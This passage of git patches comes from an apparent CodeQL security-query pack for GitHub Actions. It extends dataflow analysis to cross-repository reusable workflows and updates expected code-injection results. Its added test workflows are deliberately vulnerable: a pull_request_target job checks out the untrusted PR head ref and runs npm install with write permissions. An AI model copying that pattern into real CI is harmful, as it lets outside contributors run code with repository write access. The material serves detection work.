'dawidd6/action-download-artifact' with ref 'v2', not a pinned commit hash | .github/workflows/artifactpoisoning22.yml:13:9:17:6 | Uses Step | Uses Step | +| .github/workflows/artifactpoisoning71.yml:10:15:10:49 | dawidd6/action-download-artifact@v2 | Unpinned 3rd party Action 'artifactpoisoning71.yml' step $@ uses 'dawidd6/action-download-artifact' with ref 'v2', not a pinned commit hash | .github/workflows/artifactpoisoning71.yml:9:9:16:6 | Uses Step | Uses Step | +| .github/workflows/auto_ci.yml:94:15:94:39 | codecov/codecov-action@v3 | Unpinned 3rd party Action 'Python CI' step $@ uses 'codecov/codecov-action' with ref 'v3', not a pinned commit hash | .github/workflows/auto_ci.yml:93:9:96:6 | Uses Step | Uses Step | +| .github/workflows/auto_ci.yml:111:15:111:48 | peter-evans/create-pull-request@v5 | Unpinned 3rd party Action 'Python CI' step $@ uses 'peter-evans/create-pull-request' with ref 'v5', not a pinned commit hash | .github/workflows/auto_ci.yml:108:9:119:6 | Uses Step: create_pr | Uses Step: create_pr | +| .github/workflows/auto_ci.yml:127:15:127:56 | thollander/actions-comment-pull-request@v2 | Unpinned 3rd party Action 'Python CI' step $@ uses 'thollander/actions-comment-pull-request' with ref 'v2', not a pinned commit hash | .github/workflows/auto_ci.yml:125:9:133:6 | Uses Step | Uses Step | +| .github/workflows/issue_comment_3rd_party_action.yml:14:15:14:52 | xt0rted/pull-request-comment-branch@v2 | Unpinned 3rd party Action 'PR head from 3rd party action' step $@ uses 'xt0rted/pull-request-comment-branch' with ref 'v2', not a pinned commit hash | .github/workflows/issue_comment_3rd_party_action.yml:12:9:16:6 | Uses Step: comment-branch | Uses Step: comment-branch | +| .github/workflows/issue_comment_3rd_party_action.yml:27:15:27:52 | xt0rted/pull-request-comment-branch@v2 | Unpinned 3rd party Action 'PR head from 3rd party action' step $@ uses 'xt0rted/pull-request-comment-branch' with ref 'v2', not a pinned commit hash | .github/workflows/issue_comment_3rd_party_action.yml:25:9:30:6 | Uses Step: comment-branch | Uses Step: comment-branch | +| .github/workflows/issue_comment_3rd_party_action.yml:41:15:41:42 | eficode/resolve-pr-refs@main | Unpinned 3rd party Action 'PR head from 3rd party action' step $@ uses 'eficode/resolve-pr-refs' with ref 'main', not a pinned commit hash | .github/workflows/issue_comment_3rd_party_action.yml:39:9:45:6 | Uses Step: refs | Uses Step: refs | +| .github/workflows/issue_comment_octokit.yml:13:15:13:41 | octokit/request-action@v2.x | Unpinned 3rd party Action 'Octokit (heuristics)' step $@ uses 'octokit/request-action' with ref 'v2.x', not a pinned commit hash | .github/workflows/issue_comment_octokit.yml:12:9:19:6 | Uses Step: fetch_issue | Uses Step: fetch_issue | +| .github/workflows/issue_comment_octokit.yml:20:15:20:41 | octokit/request-action@v2.x | Unpinned 3rd party Action 'Octokit (heuristics)' step $@ uses 'octokit/request-action' with ref 'v2.x', not a pinned commit hash | .github/workflows/issue_comment_octokit.yml:19:9:26:6 | Uses Step: fetch_pr | Uses Step: fetch_pr | +| .github/workflows/issue_comment_octokit.yml:104:15:104:43 | octokit/request-action@v2.0.2 | Unpinned 3rd party Action 'Octokit (heuristics)' step $@ uses 'octokit/request-action' with ref 'v2.0.2', not a pinned commit hash | .github/workflows/issue_comment_octokit.yml:103:9:109:6 | Uses Step: request | Uses Step: request | +| .github/workflows/label_trusted_checkout.yml:20:13:20:36 | completely/fakeaction@v2 | Unpinned 3rd party Action 'label_trusted_checkout.yml' step $@ uses 'completely/fakeaction' with ref 'v2', not a pinned commit hash | .github/workflows/label_trusted_checkout.yml:20:7:24:4 | Uses Step | Uses Step | +| .github/workflows/label_trusted_checkout.yml:24:13:24:37 | fakerepo/comment-on-pr@v1 | Unpinned 3rd party Action 'label_trusted_checkout.yml' step $@ uses 'fakerepo/comment-on-pr' with ref 'v1', not a pinned commit hash | .github/workflows/label_trusted_checkout.yml:24:7:27:21 | Uses Step | Uses Step | +| .github/workflows/level0.yml:36:15:36:47 | rlespinasse/github-slug-action@v4 | Unpinned 3rd party Action 'Poutine Level 0' step $@ uses 'rlespinasse/github-slug-action' with ref 'v4', not a pinned commit hash | .github/workflows/level0.yml:36:9:39:6 | Uses Step | Uses Step | +| .github/workflows/mend.yml:31:15:31:34 | ruby/setup-ruby@v1 | Unpinned 3rd party Action 'Test' step $@ uses 'ruby/setup-ruby' with ref 'v1', not a pinned commit hash | .github/workflows/mend.yml:29:9:33:28 | Uses Step | Uses Step | +| .github/workflows/pr-workflow.yml:60:15:60:52 | amannn/action-semantic-pull-request@v5 | Unpinned 3rd party Action 'pr-workflow' step $@ uses 'amannn/action-semantic-pull-request' with ref 'v5', not a pinned commit hash | .github/workflows/pr-workflow.yml:60:9:70:6 | Uses Step | Uses Step | +| .github/workflows/pr-workflow.yml:109:15:109:42 | actionsdesk/lfs-warning@v3.2 | Unpinned 3rd party Action 'pr-workflow' step $@ uses 'actionsdesk/lfs-warning' with ref 'v3.2', not a pinned commit hash | .github/workflows/pr-workflow.yml:109:9:124:6 | Uses Step | Uses Step | +| .github/workflows/pr-workflow.yml:144:15:144:43 | cachix/install-nix-action@v20 | Unpinned 3rd party Action 'pr-workflow' step $@ uses 'cachix/install-nix-action' with ref 'v20', not a pinned commit hash | .github/workflows/pr-workflow.yml:144:9:147:6 | Uses Step | Uses Step | +| .github/workflows/pr-workflow.yml:147:15:147:60 | DeterminateSystems/magic-nix-cache-action@main | Unpinned 3rd party Action 'pr-workflow' step $@ uses 'determinatesystems/magic-nix-cache-action' with ref 'main', not a pinned commit hash | .github/workflows/pr-workflow.yml:147:9:148:6 | Uses Step | Uses Step | +| .github/workflows/pr-workflow.yml:148:15:148:41 | cachix/cachix-action@master | Unpinned 3rd party Action 'pr-workflow' step $@ uses 'cachix/cachix-action' with ref 'master', not a pinned commit hash | .github/workflows/pr-workflow.yml:148:9:154:6 | Uses Step | Uses Step | +| .github/workflows/pr-workflow.yml:347:15:347:36 | docker/login-action@v2 | Unpinned 3rd party Action 'pr-workflow' step $@ uses 'docker/login-action' with ref 'v2', not a pinned commit hash | .github/workflows/pr-workflow.yml:346:9:351:6 | Uses Step | Uses Step | +| .github/workflows/pr-workflow.yml:356:15:356:44 | softprops/action-gh-release@v1 | Unpinned 3rd party Action 'pr-workflow' step $@ uses 'softprops/action-gh-release' with ref 'v1', not a pinned commit hash | .github/workflows/pr-workflow.yml:355:9:369:2 | Uses Step | Uses Step | +| .github/workflows/pr-workflow.yml:449:15:449:43 | cachix/install-nix-action@v20 | Unpinned 3rd party Action 'pr-workflow' step $@ uses 'cachix/install-nix-action' with ref 'v20', not a pinned commit hash | .github/workflows/pr-workflow.yml:449:9:452:6 | Uses Step | Uses Step | +| .github/workflows/pr-workflow.yml:452:15:452:60 | DeterminateSystems/magic-nix-cache-action@main | Unpinned 3rd party Action 'pr-workflow' step $@ uses 'determinatesystems/magic-nix-cache-action' with ref 'main', not a pinned commit hash | .github/workflows/pr-workflow.yml:452:9:453:6 | Uses Step | Uses Step | +| .github/workflows/pr-workflow.yml:453:15:453:41 | cachix/cachix-action@master | Unpinned 3rd party Action 'pr-workflow' step $@ uses 'cachix/cachix-action' with ref 'master', not a pinned commit hash | .github/workflows/pr-workflow.yml:453:9:459:6 | Uses Step | Uses Step | +| .github/workflows/test7.yml:25:15:25:34 | pnpm/action-setup@v3 | Unpinned 3rd party Action 'Benchmark' step $@ uses 'pnpm/action-setup' with ref 'v3', not a pinned commit hash | .github/workflows/test7.yml:24:9:27:6 | Uses Step | Uses Step | +| .github/workflows/test13.yml:15:13:15:53 | sushichop/action-repository-permission@v2 | Unpinned 3rd party Action 'test13.yml' step $@ uses 'sushichop/action-repository-permission' with ref 'v2', not a pinned commit hash | .github/workflows/test13.yml:14:7:20:4 | Uses Step | Uses Step | +| .github/workflows/unpinned_tags.yml:10:13:10:22 | foo/bar@v1 | Unpinned 3rd party Action 'unpinned_tags.yml' step $@ uses 'foo/bar' with ref 'v1', not a pinned commit hash | .github/workflows/unpinned_tags.yml:10:7:11:4 | Uses Step | Uses Step | From e9dfd9ccb47779758284657133ec9a5a99938429 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 20 Sep 2024 11:54:00 +0200 Subject: [PATCH 515/707] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index 9a798b891ba4..07221cd05bb6 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: github/actions-all -version: 0.1.46 +version: 0.1.47 dependencies: codeql/util: ^1.0.1 codeql/yaml: ^1.0.1 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index 01b36fe62cde..2048e94e7ec9 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: github/actions-queries -version: 0.1.46 +version: 0.1.47 groups: [actions, queries] suites: codeql-suites extractor: javascript From 116d83da5f071d6dd5f36af7a62b2f244737240a Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 20 Sep 2024 15:40:41 +0200 Subject: [PATCH 516/707] Improve reusable workflow calls --- .../actions/dataflow/internal/DataFlowPrivate.qll | 13 ++++++++++++- 1 file changed, 12 insertions(+), 1 deletion(-) diff --git a/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll b/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll index 0d214c63c5d1..1159ccb53ae2 100644 --- a/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll +++ b/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll @@ -98,6 +98,7 @@ class DataFlowCallable instanceof Cfg::CfgScope { string getName() { if this instanceof ReusableWorkflow then + //result = this.(ReusableWorkflow).getLocation().getFile().getRelativePath() result = this.(ReusableWorkflow) .getLocation() @@ -107,7 +108,17 @@ class DataFlowCallable instanceof Cfg::CfgScope { .getLocation() .getFile() .getRelativePath() - .indexOf("/.github/workflows") + 1) + .indexOf("/.github/workflows") + 1) or + result = + this.(ReusableWorkflow) + .getLocation() + .getFile() + .getRelativePath() + .suffix(this.(ReusableWorkflow) + .getLocation() + .getFile() + .getRelativePath() + .indexOf(".github/workflows")) else if this instanceof CompositeAction then From a1e44bc918406b7a55cee9a65a054d9e62d0532e Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 20 Sep 2024 15:42:19 +0200 Subject: [PATCH 517/707] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index 07221cd05bb6..8135237d6ce8 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: github/actions-all -version: 0.1.47 +version: 0.1.48 dependencies: codeql/util: ^1.0.1 codeql/yaml: ^1.0.1 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index 2048e94e7ec9..a40d58687899 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: github/actions-queries -version: 0.1.47 +version: 0.1.48 groups: [actions, queries] suites: codeql-suites extractor: javascript From d44e7aee0ad948eab1e703ffc8e53351cf077cb7 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Sun, 22 Sep 2024 22:05:39 +0200 Subject: [PATCH 518/707] Cross remote Reusable Workflow analysis --- ql/lib/codeql/actions/Helper.qll | 16 +++++++ .../dataflow/internal/DataFlowPrivate.qll | 48 ++++++++++--------- .../CWE-094/CodeInjectionCritical.expected | 6 +++ .../CWE-094/CodeInjectionMedium.expected | 5 ++ .../TestRepo/.github/workflows/reusable.yml | 29 +++++++++++ .../.github/workflows/reusable_caller1.yaml | 11 +++++ .../.github/workflows/reusable_caller2.yaml | 11 +++++ .../.github/workflows/reusable_caller3.yaml | 11 +++++ .../.github/workflows/reusable_local.yml | 29 +++++++++++ .../UntrustedCheckoutCritical.expected | 4 ++ 10 files changed, 147 insertions(+), 23 deletions(-) create mode 100644 ql/test/query-tests/Security/CWE-829/.github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable.yml create mode 100644 ql/test/query-tests/Security/CWE-829/.github/workflows/reusable_caller1.yaml create mode 100644 ql/test/query-tests/Security/CWE-829/.github/workflows/reusable_caller2.yaml create mode 100644 ql/test/query-tests/Security/CWE-829/.github/workflows/reusable_caller3.yaml create mode 100644 ql/test/query-tests/Security/CWE-829/.github/workflows/reusable_local.yml diff --git a/ql/lib/codeql/actions/Helper.qll b/ql/lib/codeql/actions/Helper.qll index 9ac67575b8b3..f6c31a6e8eab 100644 --- a/ql/lib/codeql/actions/Helper.qll +++ b/ql/lib/codeql/actions/Helper.qll @@ -252,10 +252,26 @@ predicate inPrivilegedExternallyTriggerableJob(AstNode node) { ) } +predicate calledByPrivilegedExternallyTriggerableJob(AstNode node) { + exists(ReusableWorkflow rw, ExternalJob caller, Job callee | + callee = node.getEnclosingJob() and + rw.getACaller() = caller and + rw.getAJob() = callee and + caller.isPrivilegedExternallyTriggerable() + ) + or + exists(LocalJob caller | + caller = node.getEnclosingCompositeAction().getACallerJob() and + caller.isPrivilegedExternallyTriggerable() + ) +} + predicate inPrivilegedContext(AstNode node) { inPrivilegedCompositeAction(node) or inPrivilegedExternallyTriggerableJob(node) + or + calledByPrivilegedExternallyTriggerableJob(node) } predicate inNonPrivilegedCompositeAction(AstNode node) { diff --git a/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll b/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll index 1159ccb53ae2..529bbc82087d 100644 --- a/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll +++ b/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll @@ -89,6 +89,23 @@ class DataFlowCall instanceof Cfg::Node { Location getLocation() { result = this.(Cfg::Node).getLocation() } } +string getRepoRoot() { + exists(Workflow w | + w.getLocation().getFile().getRelativePath().indexOf("/.github/workflows") > 0 and + result = + w.getLocation() + .getFile() + .getRelativePath() + .prefix(w.getLocation().getFile().getRelativePath().indexOf("/.github/workflows") + 1) and + // exclude workflow_enum reusable workflows directory root + not result.indexOf(".github/reusable_workflows/") > -1 + or + not w.getLocation().getFile().getRelativePath().indexOf("/.github/workflows") > 0 and + not w.getLocation().getFile().getRelativePath().indexOf(".github/reusable_workflows") > -1 and + result = "" + ) +} + /** * A Cfg scope that can be called */ @@ -97,28 +114,7 @@ class DataFlowCallable instanceof Cfg::CfgScope { string getName() { if this instanceof ReusableWorkflow - then - //result = this.(ReusableWorkflow).getLocation().getFile().getRelativePath() - result = - this.(ReusableWorkflow) - .getLocation() - .getFile() - .getRelativePath() - .suffix(this.(ReusableWorkflow) - .getLocation() - .getFile() - .getRelativePath() - .indexOf("/.github/workflows") + 1) or - result = - this.(ReusableWorkflow) - .getLocation() - .getFile() - .getRelativePath() - .suffix(this.(ReusableWorkflow) - .getLocation() - .getFile() - .getRelativePath() - .indexOf(".github/workflows")) + then result = this.(ReusableWorkflow).getLocation().getFile().getRelativePath() // or else if this instanceof CompositeAction then @@ -154,7 +150,13 @@ class NormalReturn extends ReturnKind, TNormalReturn { } /** Gets a viable implementation of the target of the given `Call`. */ -DataFlowCallable viableCallable(DataFlowCall c) { c.getName() = result.getName() } +DataFlowCallable viableCallable(DataFlowCall c) { + c.getName() = result.getName() or + c.getName() = result.getName().replaceAll(getRepoRoot(), "") or + // special case for reusable workflows downloaded by the workflow_enum action + c.getName() = + result.getName().replaceAll(getRepoRoot(), "").replaceAll(".github/reusable_workflows/", "") +} /** * Gets a node that can read the value returned from `call` with return kind diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected b/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected index 4123359b5514..9ebd55088024 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected +++ b/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected @@ -1,4 +1,5 @@ edges +| .github/actions/action5/action.yml:4:3:4:7 | input taint | .github/actions/action5/action.yml:26:19:26:37 | inputs.taint | provenance | | | .github/workflows/argus_case_study.yml:15:9:24:6 | Uses Step: remove_quotations [replaced] | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | provenance | | | .github/workflows/argus_case_study.yml:17:25:17:53 | github.event.issue.title | .github/workflows/argus_case_study.yml:22:20:22:39 | env.ISSUE_TITLE | provenance | | | .github/workflows/argus_case_study.yml:22:20:22:39 | env.ISSUE_TITLE | .github/workflows/argus_case_study.yml:15:9:24:6 | Uses Step: remove_quotations [replaced] | provenance | | @@ -29,6 +30,7 @@ edges | .github/workflows/changed-files.yml:15:9:18:6 | Uses Step: changed-files1 | .github/workflows/changed-files.yml:20:24:20:76 | steps.changed-files1.outputs.all_changed_files | provenance | | | .github/workflows/changed-files.yml:33:9:38:6 | Uses Step: changed-files3 | .github/workflows/changed-files.yml:40:24:40:76 | steps.changed-files3.outputs.all_changed_files | provenance | | | .github/workflows/changed-files.yml:53:9:56:6 | Uses Step: changed-files5 | .github/workflows/changed-files.yml:58:24:58:76 | steps.changed-files5.outputs.all_changed_files | provenance | | +| .github/workflows/composite-action-caller-3.yml:12:19:12:50 | github.event.comment.body | .github/actions/action5/action.yml:4:3:4:7 | input taint | provenance | | | .github/workflows/cross3.yml:27:7:37:4 | Uses Step: remove_quotations [replaced] | .github/workflows/cross3.yml:39:31:39:75 | steps.remove_quotations.outputs.replaced | provenance | | | .github/workflows/cross3.yml:27:7:37:4 | Uses Step: remove_quotations [replaced] | .github/workflows/cross3.yml:57:29:57:73 | steps.remove_quotations.outputs.replaced | provenance | | | .github/workflows/cross3.yml:32:18:32:53 | github.event.commits[0].message | .github/workflows/cross3.yml:27:7:37:4 | Uses Step: remove_quotations [replaced] | provenance | | @@ -126,7 +128,9 @@ nodes | .github/actions/action1/action.yml:7:19:7:55 | github.event.pull_request.body | semmle.label | github.event.pull_request.body | | .github/actions/action3/action.yml:9:19:9:55 | github.event.pull_request.body | semmle.label | github.event.pull_request.body | | .github/actions/action4/action.yml:7:19:7:55 | github.event.pull_request.body | semmle.label | github.event.pull_request.body | +| .github/actions/action5/action.yml:4:3:4:7 | input taint | semmle.label | input taint | | .github/actions/action5/action.yml:16:19:16:55 | github.event.pull_request.body | semmle.label | github.event.pull_request.body | +| .github/actions/action5/action.yml:26:19:26:37 | inputs.taint | semmle.label | inputs.taint | | .github/workflows/argus_case_study.yml:15:9:24:6 | Uses Step: remove_quotations [replaced] | semmle.label | Uses Step: remove_quotations [replaced] | | .github/workflows/argus_case_study.yml:17:25:17:53 | github.event.issue.title | semmle.label | github.event.issue.title | | .github/workflows/argus_case_study.yml:22:20:22:39 | env.ISSUE_TITLE | semmle.label | env.ISSUE_TITLE | @@ -179,6 +183,7 @@ nodes | .github/workflows/comment_issue_newline.yml:10:25:10:56 | github.event.comment.body | semmle.label | github.event.comment.body | | .github/workflows/comment_issue_newline.yml:11:24:11:51 | github.event.issue.body | semmle.label | github.event.issue.body | | .github/workflows/comment_issue_newline.yml:12:24:12:55 | github.event.comment.body | semmle.label | github.event.comment.body | +| .github/workflows/composite-action-caller-3.yml:12:19:12:50 | github.event.comment.body | semmle.label | github.event.comment.body | | .github/workflows/cross3.yml:27:7:37:4 | Uses Step: remove_quotations [replaced] | semmle.label | Uses Step: remove_quotations [replaced] | | .github/workflows/cross3.yml:32:18:32:53 | github.event.commits[0].message | semmle.label | github.event.commits[0].message | | .github/workflows/cross3.yml:39:31:39:75 | steps.remove_quotations.outputs.replaced | semmle.label | steps.remove_quotations.outputs.replaced | @@ -385,6 +390,7 @@ subpaths #select | .github/actions/action1/action.yml:7:19:7:55 | github.event.pull_request.body | .github/actions/action1/action.yml:7:19:7:55 | github.event.pull_request.body | .github/actions/action1/action.yml:7:19:7:55 | github.event.pull_request.body | Potential code injection in $@, which may be controlled by an external user. | .github/actions/action1/action.yml:7:19:7:55 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | | .github/actions/action5/action.yml:16:19:16:55 | github.event.pull_request.body | .github/actions/action5/action.yml:16:19:16:55 | github.event.pull_request.body | .github/actions/action5/action.yml:16:19:16:55 | github.event.pull_request.body | Potential code injection in $@, which may be controlled by an external user. | .github/actions/action5/action.yml:16:19:16:55 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | +| .github/actions/action5/action.yml:26:19:26:37 | inputs.taint | .github/workflows/composite-action-caller-3.yml:12:19:12:50 | github.event.comment.body | .github/actions/action5/action.yml:26:19:26:37 | inputs.taint | Potential code injection in $@, which may be controlled by an external user. | .github/actions/action5/action.yml:26:19:26:37 | inputs.taint | ${{ inputs.taint }} | | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | .github/workflows/argus_case_study.yml:17:25:17:53 | github.event.issue.title | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | ${{steps.remove_quotations.outputs.replaced}} | | .github/workflows/artifactpoisoning1.yml:27:67:27:92 | steps.pr.outputs.id | .github/workflows/artifactpoisoning1.yml:14:9:20:6 | Uses Step | .github/workflows/artifactpoisoning1.yml:27:67:27:92 | steps.pr.outputs.id | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning1.yml:27:67:27:92 | steps.pr.outputs.id | ${{ steps.pr.outputs.id }} | | .github/workflows/artifactpoisoning2.yml:22:17:22:42 | steps.pr.outputs.id | .github/workflows/artifactpoisoning2.yml:13:9:19:6 | Uses Step: pr | .github/workflows/artifactpoisoning2.yml:22:17:22:42 | steps.pr.outputs.id | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning2.yml:22:17:22:42 | steps.pr.outputs.id | ${{ steps.pr.outputs.id }} | diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected b/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected index fa665b853884..c7d607f7c006 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected +++ b/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected @@ -1,4 +1,5 @@ edges +| .github/actions/action5/action.yml:4:3:4:7 | input taint | .github/actions/action5/action.yml:26:19:26:37 | inputs.taint | provenance | | | .github/workflows/argus_case_study.yml:15:9:24:6 | Uses Step: remove_quotations [replaced] | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | provenance | | | .github/workflows/argus_case_study.yml:17:25:17:53 | github.event.issue.title | .github/workflows/argus_case_study.yml:22:20:22:39 | env.ISSUE_TITLE | provenance | | | .github/workflows/argus_case_study.yml:22:20:22:39 | env.ISSUE_TITLE | .github/workflows/argus_case_study.yml:15:9:24:6 | Uses Step: remove_quotations [replaced] | provenance | | @@ -29,6 +30,7 @@ edges | .github/workflows/changed-files.yml:15:9:18:6 | Uses Step: changed-files1 | .github/workflows/changed-files.yml:20:24:20:76 | steps.changed-files1.outputs.all_changed_files | provenance | | | .github/workflows/changed-files.yml:33:9:38:6 | Uses Step: changed-files3 | .github/workflows/changed-files.yml:40:24:40:76 | steps.changed-files3.outputs.all_changed_files | provenance | | | .github/workflows/changed-files.yml:53:9:56:6 | Uses Step: changed-files5 | .github/workflows/changed-files.yml:58:24:58:76 | steps.changed-files5.outputs.all_changed_files | provenance | | +| .github/workflows/composite-action-caller-3.yml:12:19:12:50 | github.event.comment.body | .github/actions/action5/action.yml:4:3:4:7 | input taint | provenance | | | .github/workflows/cross3.yml:27:7:37:4 | Uses Step: remove_quotations [replaced] | .github/workflows/cross3.yml:39:31:39:75 | steps.remove_quotations.outputs.replaced | provenance | | | .github/workflows/cross3.yml:27:7:37:4 | Uses Step: remove_quotations [replaced] | .github/workflows/cross3.yml:57:29:57:73 | steps.remove_quotations.outputs.replaced | provenance | | | .github/workflows/cross3.yml:32:18:32:53 | github.event.commits[0].message | .github/workflows/cross3.yml:27:7:37:4 | Uses Step: remove_quotations [replaced] | provenance | | @@ -126,7 +128,9 @@ nodes | .github/actions/action1/action.yml:7:19:7:55 | github.event.pull_request.body | semmle.label | github.event.pull_request.body | | .github/actions/action3/action.yml:9:19:9:55 | github.event.pull_request.body | semmle.label | github.event.pull_request.body | | .github/actions/action4/action.yml:7:19:7:55 | github.event.pull_request.body | semmle.label | github.event.pull_request.body | +| .github/actions/action5/action.yml:4:3:4:7 | input taint | semmle.label | input taint | | .github/actions/action5/action.yml:16:19:16:55 | github.event.pull_request.body | semmle.label | github.event.pull_request.body | +| .github/actions/action5/action.yml:26:19:26:37 | inputs.taint | semmle.label | inputs.taint | | .github/workflows/argus_case_study.yml:15:9:24:6 | Uses Step: remove_quotations [replaced] | semmle.label | Uses Step: remove_quotations [replaced] | | .github/workflows/argus_case_study.yml:17:25:17:53 | github.event.issue.title | semmle.label | github.event.issue.title | | .github/workflows/argus_case_study.yml:22:20:22:39 | env.ISSUE_TITLE | semmle.label | env.ISSUE_TITLE | @@ -179,6 +183,7 @@ nodes | .github/workflows/comment_issue_newline.yml:10:25:10:56 | github.event.comment.body | semmle.label | github.event.comment.body | | .github/workflows/comment_issue_newline.yml:11:24:11:51 | github.event.issue.body | semmle.label | github.event.issue.body | | .github/workflows/comment_issue_newline.yml:12:24:12:55 | github.event.comment.body | semmle.label | github.event.comment.body | +| .github/workflows/composite-action-caller-3.yml:12:19:12:50 | github.event.comment.body | semmle.label | github.event.comment.body | | .github/workflows/cross3.yml:27:7:37:4 | Uses Step: remove_quotations [replaced] | semmle.label | Uses Step: remove_quotations [replaced] | | .github/workflows/cross3.yml:32:18:32:53 | github.event.commits[0].message | semmle.label | github.event.commits[0].message | | .github/workflows/cross3.yml:39:31:39:75 | steps.remove_quotations.outputs.replaced | semmle.label | steps.remove_quotations.outputs.replaced | diff --git a/ql/test/query-tests/Security/CWE-829/.github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable.yml b/ql/test/query-tests/Security/CWE-829/.github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable.yml new file mode 100644 index 000000000000..3b8a6d6dd62a --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/.github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable.yml @@ -0,0 +1,29 @@ +name: Test + +on: + workflow_call: + inputs: + branch: + type: string + default: "**" + +defaults: + run: + shell: bash + +jobs: + test: + name: Checkout + runs-on: ubuntu-latest + + permissions: + contents: write + pull-requests: write + steps: + - uses: actions/checkout@v2 + with: + ref: ${{ inputs.branch }} + - run: | + npm install + npm run lint + diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/reusable_caller1.yaml b/ql/test/query-tests/Security/CWE-829/.github/workflows/reusable_caller1.yaml new file mode 100644 index 000000000000..e53e55aff4ce --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/reusable_caller1.yaml @@ -0,0 +1,11 @@ +name: assets-test + +on: + pull_request_target: + +jobs: + check-execution-context: + uses: TestOrg/TestRepo/.github/workflows/reusable.yml@main + with: + branch: ${{ github.event.pull_request.head.ref }} + diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/reusable_caller2.yaml b/ql/test/query-tests/Security/CWE-829/.github/workflows/reusable_caller2.yaml new file mode 100644 index 000000000000..50c0dd4901cd --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/reusable_caller2.yaml @@ -0,0 +1,11 @@ +name: assets-test + +on: + pull_request: + +jobs: + check-execution-context: + uses: TestOrg/TestRepo/.github/workflows/reusable.yml@main + with: + branch: ${{ github.event.pull_request.head.ref }} + diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/reusable_caller3.yaml b/ql/test/query-tests/Security/CWE-829/.github/workflows/reusable_caller3.yaml new file mode 100644 index 000000000000..1e7558b3bc08 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/reusable_caller3.yaml @@ -0,0 +1,11 @@ +name: assets-test + +on: + pull_request: + +jobs: + check-execution-context: + uses: ./.github/workflows/reusable_local.yml + with: + branch: ${{ github.event.pull_request.head.ref }} + diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/reusable_local.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/reusable_local.yml new file mode 100644 index 000000000000..3b8a6d6dd62a --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/reusable_local.yml @@ -0,0 +1,29 @@ +name: Test + +on: + workflow_call: + inputs: + branch: + type: string + default: "**" + +defaults: + run: + shell: bash + +jobs: + test: + name: Checkout + runs-on: ubuntu-latest + + permissions: + contents: write + pull-requests: write + steps: + - uses: actions/checkout@v2 + with: + ref: ${{ inputs.branch }} + - run: | + npm install + npm run lint + diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected index 8bb9e02559c8..3db6902ad2f6 100644 --- a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected +++ b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected @@ -1,6 +1,7 @@ edges | 